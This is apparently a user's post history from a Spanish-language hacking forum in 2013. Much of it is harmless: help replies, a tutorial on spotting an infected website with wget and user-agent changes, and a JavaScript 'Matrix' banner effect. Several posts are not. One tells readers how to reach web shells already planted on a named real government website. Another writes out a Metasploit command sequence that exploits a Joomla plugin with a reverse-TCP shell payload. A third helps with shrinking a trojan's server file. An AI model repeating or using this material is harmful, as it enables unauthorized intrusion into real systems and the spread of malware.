Muy bueno doddy, probando!! ahora te cuento a ver que tal! 
Edito: Funciona muy bien, gran trabajo!!
Gracias por aportarlo
Edito: Funciona muy bien, gran trabajo!!
Gracias por aportarlo
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#1882
Dudas y pedidos generales / Re:Multi-Antivirus Cual Usar?
Julio 22, 2013, 06:40:25 AM
Sinceramente? de los que yo conozco ese es el más actualizado que conozco... aparte de que funciona bastante bien
Un saludo
Un saludo
#1883
Pentesting / Re:Eliminacion de archivos arbitrarios
Julio 21, 2013, 06:44:00 PM
Muy buen aporte, en mi opinión este tipo de archivos son más peligrosos que útiles asique los evito en todo caso...
Un saludo
Un saludo
#1884
Cursos, manuales y libros / Re:Pack de Cursos [Hacking, Malwares, Seguridad, Redes etc]
Julio 21, 2013, 06:37:14 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
hola por favor podrian resubir los link se los agraeceria
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay uno aún que funciona...
Un saludo
#1885
Hacking ShowOff / Re:SQLI http://www.vialidad.gba.gov.ar/
Julio 21, 2013, 06:35:23 PM
No sé si lo sabias o no, pero ya hay shells ahi...
Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fijate a la derecha salen muchos archivos en php, pues si le das al iconito verde entras a ese archivo, muchos están eliminados pero otros no.
Un saludo
Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fijate a la derecha salen muchos archivos en php, pues si le das al iconito verde entras a ese archivo, muchos están eliminados pero otros no.
Un saludo
#1886
Seguridad web y en servidores / Re:Proteger nuestro server web de ataques con .htaccess
Julio 21, 2013, 06:32:22 PM
Pero si junto los dos archivos fijo que da error, a que te refieres con lo de extras?
Un saludo.
Un saludo.
#1887
Dudas y pedidos generales / Re:Ayuda IP Fantasma dentro de mi red
Julio 21, 2013, 09:54:43 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
firewall contra icmp
Es posible, pero, podría dar más datos... supongo que habrás comprobado que de verdad están en la misma red no? si es así, puede ser lo que dice Psymera.
Una cosa, la mac es la mac y no se puede usar como ip, lo digo por este comentario:
Citaruna sospecha es que esta usando la mac como ip dentro de su servidor ?
SeCurity, revisa tu firewall, podrías darnos más datos como el sistema operativo que utilizan los equipos.
Un saludo.
#1888
Dudas y pedidos generales / Re:Ayuda IP Fantasma dentro de mi red
Julio 21, 2013, 07:34:07 AM
No entiendo tu problema, te refieres a que no se encuentran al hacer un ping?
Un saludo.
Un saludo.
#1889
Seguridad web y en servidores / Re:Proteger nuestro server web de ataques con .htaccess
Julio 21, 2013, 07:30:35 AM
Ese .htaccess no funciona... me salta error y no carga la web.
Alguna idea?
Un saludo.
Alguna idea?
Un saludo.
#1890
Dudas y pedidos generales / Re:programa para conprimir el servidor de mi troyano
Julio 21, 2013, 07:27:49 AM
Mmmm a ver, la verdad nunca he tenido ese problema de bajarle el peso... se que existían los downloaders que permitían bajarle el peso... pero claro, estamos hablando de hace ya bastante tiempo... tanto pesa el server?
PD: Edita el titulo, es comprimir no conprimir
Un saludo.
PD: Edita el titulo, es comprimir no conprimir
Un saludo.
#1891
Seguridad web y en servidores / Destripando una web y descubriendo malware! [Tutorial]
Julio 20, 2013, 06:52:22 PM
Hoy en día, hay muchas webs que están infectadas por malwares estos atacan solo a unos cuantos navegadores vulnerables, en este tutorial vamos a aprender a reconocer una web infectada.
Lo primero que necesitamos es una web, pero recordar, tenemos sospechas de que está infectada por lo que no vamos a acceder a ella, directamente bajaremos su código fuente:
NOTA: He borrado la dirección de la web infectada por motivos de seguridad.
Código: php
Una vez tenemos el código fuente de la web, vamos a probar cambiando el user-agent
Podemos obtener una lista desde aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Elegimos un user-agent, yo escogí este:
Código: php
Ahora volvemos a hacer lo mismo pero añadiendo este parámetro:
Código: php
Comparamos los diferentes archivos en busca de diferencias:
Observamos que el archivo con diferente user-agent tiene javascript ofuscado... vamos a desofuscar ese javascript para saber que contiene!
Para hacer rápido el tutorial y para que lo puedan hacer los más iniciados en este tema, recomiendo subir el javascript a esta web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como vemos, ahí está el verdadero javascript, para evitar entrar a la web, analizaremos la url...
Bueno, después de este analisis, llegamos a la conclusión de que la web está infectada, podríamos analizar a fondo la dirección que nos sale del código, pero en este caso no es necesario porque tenemos la seguridad de que se trata de un malware.
Un saludo.
Lo primero que necesitamos es una web, pero recordar, tenemos sospechas de que está infectada por lo que no vamos a acceder a ella, directamente bajaremos su código fuente:
NOTA: He borrado la dirección de la web infectada por motivos de seguridad.
wget www.sitioweb.comUna vez tenemos el código fuente de la web, vamos a probar cambiando el user-agent
Podemos obtener una lista desde aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Elegimos un user-agent, yo escogí este:
Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0Ahora volvemos a hacer lo mismo pero añadiendo este parámetro:
wget www.sitioweb.com --user-agent "Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0"Comparamos los diferentes archivos en busca de diferencias:
Observamos que el archivo con diferente user-agent tiene javascript ofuscado... vamos a desofuscar ese javascript para saber que contiene!
Para hacer rápido el tutorial y para que lo puedan hacer los más iniciados en este tema, recomiendo subir el javascript a esta web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como vemos, ahí está el verdadero javascript, para evitar entrar a la web, analizaremos la url...
Bueno, después de este analisis, llegamos a la conclusión de que la web está infectada, podríamos analizar a fondo la dirección que nos sale del código, pero en este caso no es necesario porque tenemos la seguridad de que se trata de un malware.
Un saludo.
#1892
Diseño UX/UI / Re:Pide tu firma Underc0de!
Julio 20, 2013, 11:03:39 AM
Si aún está activo me gustaría la mía
Gracias y un saludo.
Gracias y un saludo.
#1893
Zona Webmaster / [JavaScript][BASICO] Efecto Matrix
Julio 20, 2013, 08:29:52 AM
Aquí les dejo el código que simula matrix, muy bueno para titulos o incorporarlo a algún banner:
Código: javascript
Solo hay que editar el texto que dice Blackdrake por el que quieran.
Un saludo
<style type="text/css">
.matrix { font-family:Lucida Console, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
</style>
<script type="text/javascript" language="JavaScript">
<!--
var rows=11; // must be an odd number
var speed=50; // lower is faster
var reveal=2; // between 0 and 2 only. The higher, the faster the word appears
var effectalign="default" //enter "center" to center it.
var w3c=document.getElementById && !window.opera;;
var ie45=document.all && !window.opera;
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
var m_coch=new Array();
var m_copo=new Array();
window.onload=function() {
if (!w3c && !ie45) return
var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
ma_txt=" "+ma_txt+" ";
columns=ma_txt.length;
if (w3c) {
while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
ma_tab=document.createElement("table");
ma_tab.setAttribute("border", 0);
ma_tab.setAttribute("align", effectalign);
ma_tab.style.backgroundColor="#000000";
ma_bod=document.createElement("tbody");
for (x=0; x<rows; x++) {
ma_row=document.createElement("tr");
for (y=0; y<columns; y++) {
matemp=document.createElement("td");
matemp.setAttribute("id", "Mx"+x+"y"+y);
matemp.className="matrix";
matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
ma_row.appendChild(matemp);
}
ma_bod.appendChild(ma_row);
}
ma_tab.appendChild(ma_bod);
matrix.appendChild(ma_tab);
} else {
ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
for (var x=0; x<rows; x++) {
ma_tab+='<t'+'r>';
for (var y=0; y<columns; y++) {
ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
}
ma_tab+='</'+'tr>';
}
ma_tab+='</'+'table>';
matrix.innerHTML=ma_tab;
}
ma_cho=ma_txt;
for (x=0; x<columns; x++) {
ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
m_copo[x]=0;
}
ma_bod=setInterval("mytricks()", speed);
}
function mytricks() {
x=0;
for (y=0; y<columns; y++) {
x=x+(m_copo[y]==100);
ma_row=m_copo[y]%100;
if (ma_row && m_copo[y]<100) {
if (ma_row<rows+1) {
if (w3c) {
matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
matemp.firstChild.nodeValue=m_coch[y];
}
else {
matemp=document.all["Mx"+(ma_row-1)+"y"+y];
matemp.innerHTML=m_coch[y];
}
matemp.style.color="#33ff66";
matemp.style.fontWeight="bold";
}
if (ma_row>1 && ma_row<rows+2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
matemp.style.fontWeight="normal";
matemp.style.color="#00ff00";
}
if (ma_row>2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
matemp.style.color="#009900";
}
if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
else if (ma_row<rows+2) m_copo[y]++;
else if (m_copo[y]<100) m_copo[y]=0;
}
else if (Math.random()>0.9 && m_copo[y]<100) {
m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
m_copo[y]++;
}
}
if (x==columns) clearInterval(ma_bod);
}
function zoomer(ycol) {
var mtmp, mtem, ytmp;
if (m_copo[ycol]==Math.floor(rows/2)+1) {
for (ytmp=0; ytmp<rows; ytmp++) {
if (w3c) {
mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
mtmp.firstChild.nodeValue=m_coch[ycol];
}
else {
mtmp=document.all["Mx"+ytmp+"y"+ycol];
mtmp.innerHTML=m_coch[ycol];
}
mtmp.style.color="#33ff66";
mtmp.style.fontWeight="bold";
}
if (Math.random()<reveal) {
mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
}
if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
m_copo[ycol]+=199;
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]>200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
}
mtmp.style.fontWeight="normal";
mtem.style.fontWeight="normal";
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
if (m_copo[ycol]>100 && m_copo[ycol]<200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
mtmp.firstChild.nodeValue=String.fromCharCode(160);
mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
mtem.firstChild.nodeValue=String.fromCharCode(160);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
mtmp.innerHTML=String.fromCharCode(160);
mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
mtem.innerHTML=String.fromCharCode(160);
}
setTimeout("zoomer("+ycol+")", speed);
}
}
// -->
</script>
<div id="matrix">Blackdrake</div>Solo hay que editar el texto que dice Blackdrake por el que quieran.
Un saludo
#1894
Zona Webmaster / Re:[JavaScript] Detectando Errores
Julio 20, 2013, 08:03:20 AM
Muy bueno arthusu muchas gracias por el aporte
#1895
Off Topic / Re:Underc0de te desea un muy feliz dia del amigo!
Julio 20, 2013, 07:16:58 AM
Feliz dia a todos y ojala que la comunidad siga asi 
#1896
Dudas y pedidos generales / Re:Tengo dudas para elegir un programas que llevan el control.
Julio 18, 2013, 07:12:07 AM
Busca un programador y que te lo haga xD
No creo que nadie te pueda ayudar, buscas un software muy enfocado a tu negocio...
Un saludo.
No creo que nadie te pueda ayudar, buscas un software muy enfocado a tu negocio...
Un saludo.
#1897
Dudas y pedidos generales / Re:Comandos :S
Julio 18, 2013, 07:08:35 AM
En mac no necesitas usar apt-get install o aptitude ni nada así xD
Te dejo una lista de comandos por si quieres echarle un vistazo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Un saludo
Te dejo una lista de comandos por si quieres echarle un vistazo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Un saludo
#1898
Dudas y pedidos generales / Re:Ayuda con exploit para Joomla
Julio 18, 2013, 07:03:36 AM
Mmmm podrías decirme el nombre del exploit? es este?
Código: php
Pones todos los datos correctamente?
Puedes ver el código desde aquí y así ves donde te salta el error: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Un saludo.
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST MIIP
msf exploit(joomla_tinybrowser) > set RHOST OBJETIVO
msf exploit(joomla_tinybrowser) > exploitPones todos los datos correctamente?
Puedes ver el código desde aquí y así ves donde te salta el error: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Un saludo.
#1899
Dudas y pedidos generales / Re:Error al instalar Office 2013
Julio 16, 2013, 04:05:11 PM
Has probado a ejecutarlo como administración o a cambiar lo de ejecutar como otra versión de windows?
Un saludo.
Un saludo.
#1900
Dudas y pedidos generales / Re:Programacion
Julio 16, 2013, 04:03:40 PM
Podrías especificar mas, que lenguaje quieres aprender?
Aunque como dice @Underc0der, centrate en lo básico y desde ahí empieza a estudiarlo más a fondo.
Pasate por aquí No tienes permitido ver los links. Registrarse o Entrar a mi cuenta alomejor te sirve
Un saludo
Aunque como dice @Underc0der, centrate en lo básico y desde ahí empieza a estudiarlo más a fondo.
Pasate por aquí No tienes permitido ver los links. Registrarse o Entrar a mi cuenta alomejor te sirve
Un saludo
